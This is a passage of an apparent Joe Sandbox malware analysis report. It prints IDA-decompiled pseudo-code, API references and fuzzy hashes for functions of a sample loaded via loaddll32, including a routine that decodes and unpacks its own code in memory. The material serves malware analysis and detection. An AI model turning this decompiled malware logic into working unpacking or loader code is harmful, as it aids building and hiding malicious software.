                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: bb4d6e40519a211fba361e6cc509fa038c6ee37e4e9b10ef0f7110e54dbb4fa3
                                                                                                                                                                                                                                    • Instruction ID: 287b98a60ae6d542340f3fd538a785522fd7f5c7fe0aefd0910713086742421f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb4d6e40519a211fba361e6cc509fa038c6ee37e4e9b10ef0f7110e54dbb4fa3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731ECB2900109EFDF05DF98D8C48AEBBB5FF48384B10846EE60AE7210D7359685CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004018F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E004018F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x404130;
				_t39 = E00401F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x40414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x4051a7; // 0x4051a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E004018C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x40414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}























                                                                                                                                                                                                                                    0x004018fb
                                                                                                                                                                                                                                    0x0040190b
                                                                                                                                                                                                                                    0x00401912
                                                                                                                                                                                                                                    0x00401915
                                                                                                                                                                                                                                    0x0040192a
                                                                                                                                                                                                                                    0x00401931
                                                                                                                                                                                                                                    0x00401936
                                                                                                                                                                                                                                    0x00401947
                                                                                                                                                                                                                                    0x0040194a
                                                                                                                                                                                                                                    0x00401952
                                                                                                                                                                                                                                    0x00401955
                                                                                                                                                                                                                                    0x004019ff
                                                                                                                                                                                                                                    0x0040195b
                                                                                                                                                                                                                                    0x0040195b
                                                                                                                                                                                                                                    0x0040195f
                                                                                                                                                                                                                                    0x004019c7
                                                                                                                                                                                                                                    0x00401961
                                                                                                                                                                                                                                    0x00401961
                                                                                                                                                                                                                                    0x00401964
                                                                                                                                                                                                                                    0x00401966
                                                                                                                                                                                                                                    0x0040196e
                                                                                                                                                                                                                                    0x00401971
                                                                                                                                                                                                                                    0x00401974
                                                                                                                                                                                                                                    0x0040197c
                                                                                                                                                                                                                                    0x00401984
                                                                                                                                                                                                                                    0x00401985
                                                                                                                                                                                                                                    0x00401986
                                                                                                                                                                                                                                    0x0040198d
                                                                                                                                                                                                                                    0x0040198d
                                                                                                                                                                                                                                    0x004019a1
                                                                                                                                                                                                                                    0x004019a6
                                                                                                                                                                                                                                    0x004019af
                                                                                                                                                                                                                                    0x004019b6
                                                                                                                                                                                                                                    0x004019b9
                                                                                                                                                                                                                                    0x004019bd
                                                                                                                                                                                                                                    0x004019c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401979
                                                                                                                                                                                                                                    0x00401979
                                                                                                                                                                                                                                    0x004019c4
                                                                                                                                                                                                                                    0x004019d1
                                                                                                                                                                                                                                    0x004019e6
                                                                                                                                                                                                                                    0x004019d3
                                                                                                                                                                                                                                    0x004019dc
                                                                                                                                                                                                                                    0x004019e1
                                                                                                                                                                                                                                    0x004019f7
                                                                                                                                                                                                                                    0x004019f7
                                                                                                                                                                                                                                    0x00401a06
                                                                                                                                                                                                                                    0x00401a0c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                                                                                                                                                                                                    • memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                    • String ID: Mar 9 2021
                                                                                                                                                                                                                                    • API String ID: 4010158826-2159264323
                                                                                                                                                                                                                                    • Opcode ID: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                                                                                                                                                                                                    • Instruction ID: 0ad7c3425218c347bc4ddf429e648667056d2cd7a8494b6520e06ca5c12f1d10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb228c351fb0361c2fc9e029ed6e6128681d59fb3180a8fdea020d7e3bab62b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF3163B1E011199FDF01CF99C881AAEBBB9FF48304F108139E505BB295D775AA45CF98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F91A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                                                                                    			E02F91A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02F92049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                                                                                                                                    0x02f91a7c
                                                                                                                                                                                                                                    0x02f91a80
                                                                                                                                                                                                                                    0x02f91a81
                                                                                                                                                                                                                                    0x02f91a82
                                                                                                                                                                                                                                    0x02f91a84
                                                                                                                                                                                                                                    0x02f91a86
                                                                                                                                                                                                                                    0x02f91a8b
                                                                                                                                                                                                                                    0x02f91a8e
                                                                                                                                                                                                                                    0x02f91b25
                                                                                                                                                                                                                                    0x02f91b2c
                                                                                                                                                                                                                                    0x02f91b2c
                                                                                                                                                                                                                                    0x02f91a97
                                                                                                                                                                                                                                    0x02f91a9e
                                                                                                                                                                                                                                    0x02f91aae
                                                                                                                                                                                                                                    0x02f91aae
                                                                                                                                                                                                                                    0x02f91ab4
                                                                                                                                                                                                                                    0x02f91ab6
                                                                                                                                                                                                                                    0x02f91abb
                                                                                                                                                                                                                                    0x02f91ac4
                                                                                                                                                                                                                                    0x02f91acc
                                                                                                                                                                                                                                    0x02f91acf
                                                                                                                                                                                                                                    0x02f91ada
                                                                                                                                                                                                                                    0x02f91ade
                                                                                                                                                                                                                                    0x02f91ae0
                                                                                                                                                                                                                                    0x02f91ae1
                                                                                                                                                                                                                                    0x02f91aea
                                                                                                                                                                                                                                    0x02f91aee
                                                                                                                                                                                                                                    0x02f91aff
                                                                                                                                                                                                                                    0x02f91af0
                                                                                                                                                                                                                                    0x02f91af5
                                                                                                                                                                                                                                    0x02f91afa
                                                                                                                                                                                                                                    0x02f91b09
                                                                                                                                                                                                                                    0x02f91b09
                                                                                                                                                                                                                                    0x02f91ade
                                                                                                                                                                                                                                    0x02f91b0f
                                                                                                                                                                                                                                    0x02f91b15
                                                                                                                                                                                                                                    0x02f91b15
                                                                                                                                                                                                                                    0x02f91b1e
                                                                                                                                                                                                                                    0x02f91b23
                                                                                                                                                                                                                                    0x02f91b23
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1198164300-0
                                                                                                                                                                                                                                    • Opcode ID: bd62412861778fe7a73d43f9b345ec2783cf93fd4cfe92fe302c4f64639ba057
                                                                                                                                                                                                                                    • Instruction ID: e817dbf0e71f8b2b16fc07a96a3005e17e79ccb5e8d681e8e704e35fcaaf4319
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd62412861778fe7a73d43f9b345ec2783cf93fd4cfe92fe302c4f64639ba057
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72213275E0020AEFEF11DFA8D88499EBBB6FF49355B104579EA09D7214E7309A44CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F994A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E02F994A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02F92049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2f9c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2f9c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                                                                                                                                                                                                    0x02f994b4
                                                                                                                                                                                                                                    0x02f994b8
                                                                                                                                                                                                                                    0x02f994ba
                                                                                                                                                                                                                                    0x02f994bb
                                                                                                                                                                                                                                    0x02f994c3
                                                                                                                                                                                                                                    0x02f994c3
                                                                                                                                                                                                                                    0x02f994c7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f994be
                                                                                                                                                                                                                                    0x02f994bf
                                                                                                                                                                                                                                    0x02f994c2
                                                                                                                                                                                                                                    0x02f994c2
                                                                                                                                                                                                                                    0x02f994cf
                                                                                                                                                                                                                                    0x02f994d6
                                                                                                                                                                                                                                    0x02f994da
                                                                                                                                                                                                                                    0x02f994e2
                                                                                                                                                                                                                                    0x02f994e8
                                                                                                                                                                                                                                    0x02f994ea
                                                                                                                                                                                                                                    0x02f994ef
                                                                                                                                                                                                                                    0x02f994f3
                                                                                                                                                                                                                                    0x02f994f5
                                                                                                                                                                                                                                    0x02f994f8
                                                                                                                                                                                                                                    0x02f994ff
                                                                                                                                                                                                                                    0x02f994ff
                                                                                                                                                                                                                                    0x02f99509
                                                                                                                                                                                                                                    0x02f9950c
                                                                                                                                                                                                                                    0x02f9950f
                                                                                                                                                                                                                                    0x02f9950f
                                                                                                                                                                                                                                    0x02f9951b
                                                                                                                                                                                                                                    0x02f9951b
                                                                                                                                                                                                                                    0x02f99528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,00000000,033E95AC,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994C3
                                                                                                                                                                                                                                    • StrTrimA.KERNELBASE(?,02F9C2A4,00000002,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994E2
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,00000020,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994ED
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000001,02F9C2A4,?,02F923DE,?,02F97634,033E95AC,?,02F923DE), ref: 02F994FF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Trim
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3043112668-0
                                                                                                                                                                                                                                    • Opcode ID: ed38d38e48d712b2da7886d4eacbc714612879a0058778f2f225387347241457
                                                                                                                                                                                                                                    • Instruction ID: 8140043c14d5f0a65f4d8a5add08ea4b68a843b12d792eecc0253bc2c087459a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed38d38e48d712b2da7886d4eacbc714612879a0058778f2f225387347241457
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86015272A453156FF7319E69CC49F3BBBD8EB8AAD4F12051DFA45C7240DBA0C8018AA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040111A, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E0040111A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E0040163F(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                                                                                                                    0x00401123
                                                                                                                                                                                                                                    0x00401128
                                                                                                                                                                                                                                    0x00401136
                                                                                                                                                                                                                                    0x0040113b
                                                                                                                                                                                                                                    0x0040113b
                                                                                                                                                                                                                                    0x00401141
                                                                                                                                                                                                                                    0x00401146
                                                                                                                                                                                                                                    0x0040114a
                                                                                                                                                                                                                                    0x0040114e
                                                                                                                                                                                                                                    0x0040114e
                                                                                                                                                                                                                                    0x00401158
                                                                                                                                                                                                                                    0x00401161

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040111D
                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401128
                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 0040113B
                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040114E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                    • Opcode ID: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                                                                                                                                                                                                    • Instruction ID: 67fa18b92f8a63c61967de09933370e0a35cc4576ff87cf796d34e9f8e5d67a8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E092712062106BE3117B295C85E6B6B5CDF95331B014236F620F62F0CB798D0286AD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F973FD, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F973FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02F9A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2f9d27c; // 0x44a5a8
				_t4 = _t24 + 0x2f9ede0; // 0x33e9388
				_t5 = _t24 + 0x2f9ed88; // 0x4f0053
				_t26 = E02F91262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2f9d27c; // 0x44a5a8
						_t11 = _t32 + 0x2f9edd4; // 0x33e937c
						_t48 = _t11;
						_t12 = _t32 + 0x2f9ed88; // 0x4f0053
						_t55 = E02F97CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x2f9d27c; // 0x44a5a8
							_t13 = _t35 + 0x2f9ee1e; // 0x30314549
							if(E02F989D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x2f9d25c - 6;
								if( *0x2f9d25c <= 6) {
									_t42 =  *0x2f9d27c; // 0x44a5a8
									_t15 = _t42 + 0x2f9ec2a; // 0x52384549
									E02F989D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x2f9d27c; // 0x44a5a8
							_t17 = _t38 + 0x2f9ee18; // 0x33e93c0
							_t18 = _t38 + 0x2f9edf0; // 0x680043
							_t45 = E02F92659(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x2f9d238, 0, _t55);
						}
					}
					HeapFree( *0x2f9d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02F91F99(_t54);
				}
				return _t45;
			}

















                                                                                                                                                                                                                                    0x02f973fd
                                                                                                                                                                                                                                    0x02f9740d
                                                                                                                                                                                                                                    0x02f97410
                                                                                                                                                                                                                                    0x02f97417
                                                                                                                                                                                                                                    0x02f97419
                                                                                                                                                                                                                                    0x02f97419
                                                                                                                                                                                                                                    0x02f9741c
                                                                                                                                                                                                                                    0x02f97421
                                                                                                                                                                                                                                    0x02f97428
                                                                                                                                                                                                                                    0x02f97435
                                                                                                                                                                                                                                    0x02f9743a
                                                                                                                                                                                                                                    0x02f9743e
                                                                                                                                                                                                                                    0x02f9744c
                                                                                                                                                                                                                                    0x02f9745a
                                                                                                                                                                                                                                    0x02f9745e
                                                                                                                                                                                                                                    0x02f974ef
                                                                                                                                                                                                                                    0x02f974ef
                                                                                                                                                                                                                                    0x02f97464
                                                                                                                                                                                                                                    0x02f97464
                                                                                                                                                                                                                                    0x02f97469
                                                                                                                                                                                                                                    0x02f97469
                                                                                                                                                                                                                                    0x02f97470
                                                                                                                                                                                                                                    0x02f9747c
                                                                                                                                                                                                                                    0x02f9747e
                                                                                                                                                                                                                                    0x02f97480
                                                                                                                                                                                                                                    0x02f97482
                                                                                                                                                                                                                                    0x02f97489
                                                                                                                                                                                                                                    0x02f9749b
                                                                                                                                                                                                                                    0x02f9749d
                                                                                                                                                                                                                                    0x02f974a4
                                                                                                                                                                                                                                    0x02f974a6
                                                                                                                                                                                                                                    0x02f974ad
                                                                                                                                                                                                                                    0x02f974b8
                                                                                                                                                                                                                                    0x02f974b8
                                                                                                                                                                                                                                    0x02f974a4
                                                                                                                                                                                                                                    0x02f974bd
                                                                                                                                                                                                                                    0x02f974c2
                                                                                                                                                                                                                                    0x02f974c9
                                                                                                                                                                                                                                    0x02f974e7
                                                                                                                                                                                                                                    0x02f974e9
                                                                                                                                                                                                                                    0x02f974e9
                                                                                                                                                                                                                                    0x02f97480
                                                                                                                                                                                                                                    0x02f974fb
                                                                                                                                                                                                                                    0x02f974fb
                                                                                                                                                                                                                                    0x02f974fd
                                                                                                                                                                                                                                    0x02f97502
                                                                                                                                                                                                                                    0x02f97504
                                                                                                                                                                                                                                    0x02f97504
                                                                                                                                                                                                                                    0x02f9750f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033E9388,00000000,?,76D7F710,00000000,76D7F730), ref: 02F9744C
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033E93C0,?,00000000,30314549,00000014,004F0053,033E937C), ref: 02F974E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F96814), ref: 02F974FB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: be24c4049c9e2d41b4968574ccd6f367dd29d7c27c945123a833094b987c8f81
                                                                                                                                                                                                                                    • Instruction ID: d80e71b743771d9ea16ea7e99a003df0cf5a1ee4d0665a6de1c3afa518f4aef8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be24c4049c9e2d41b4968574ccd6f367dd29d7c27c945123a833094b987c8f81
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C43192B1D0020CFFEF21EBA5DD48E9ABBADEB457C4F150066B605A7121D370AA14DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F98504, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E02F98504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2f9d340; // 0x33e8d39
				_push(0x800);
				_push(0);
				_push( *0x2f9d238);
				if( *0x2f9d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2f9d24c =  *0x2f9d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02F92496(_t44, _t40); // executed
						_t18 = E02F9A66E(_t37, _t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2f9d24c < 5) {
								 *0x2f9d24c =  *0x2f9d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02F9A1B0();
						RtlFreeHeap( *0x2f9d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E02F9A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02F98B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}











                                                                                                                                                                                                                                    0x02f98504
                                                                                                                                                                                                                                    0x02f98507
                                                                                                                                                                                                                                    0x02f98508
                                                                                                                                                                                                                                    0x02f98512
                                                                                                                                                                                                                                    0x02f98519
                                                                                                                                                                                                                                    0x02f9851e
                                                                                                                                                                                                                                    0x02f98520
                                                                                                                                                                                                                                    0x02f98526
                                                                                                                                                                                                                                    0x02f9854e
                                                                                                                                                                                                                                    0x02f98566
                                                                                                                                                                                                                                    0x02f98568
                                                                                                                                                                                                                                    0x02f98569
                                                                                                                                                                                                                                    0x02f9856b
                                                                                                                                                                                                                                    0x02f985a9
                                                                                                                                                                                                                                    0x02f985a9
                                                                                                                                                                                                                                    0x02f985af
                                                                                                                                                                                                                                    0x02f985b5
                                                                                                                                                                                                                                    0x02f985b5
                                                                                                                                                                                                                                    0x02f9856d
                                                                                                                                                                                                                                    0x02f98573
